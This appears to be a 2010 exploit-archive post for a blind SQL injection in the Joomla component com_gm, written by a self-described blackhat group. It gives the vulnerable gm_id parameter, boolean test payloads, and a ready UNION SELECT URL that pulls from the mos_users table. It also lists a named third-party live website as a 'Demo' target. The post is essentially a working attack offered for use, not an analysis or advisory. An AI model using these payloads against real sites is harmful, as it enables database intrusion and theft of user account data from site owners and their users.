Home / os / winme

Joomla Component com_gm Blind SQL Injection Vulnerability

Posted on 16 March 2010

========================================================= Joomla Component com_gm Blind SQL Injection Vulnerability ========================================================= [~]######################################### InformatioN #############################################[~] [~] Title : Joomla Component com_gm Blind SQL Injection [~] Author : DevilZ TM By D3v1l [~] Homepage : http://www.DEVILZTM.com [~] Email : Expl0it@DevilZTM.com [~] Contact : D3v1l.blackhat@yahoo.com [~]######################################### ExploiT #############################################[~] [~] Vulnerable File : http://127.0.0.1/index.php?option=com_gm&func=detail&gm_id=[Blind SQL] [~] ExploiT : 1+AND+1=0 , 1+AND+1=1 [~] Example : http://127.0.0.1/index.php?option=com_gm&func=detail&gm_id=1+AND+1=0+UNION+SELECT+1,2,3,4,5,6,7,8,9,0,11,12,13,14,15+FROM+mos_users [~] Demo : http://www.creativeurope.com/index.php?option=com_gm&func=detail&gm_id=1+AND+1=0+UNION+SELECT+1,2,3,4,5,6,7,8,9,0,11,12,13,14,15+FROM+mos_users # ~ - [ [ : Inj3ct0r : ] ]

 

TOP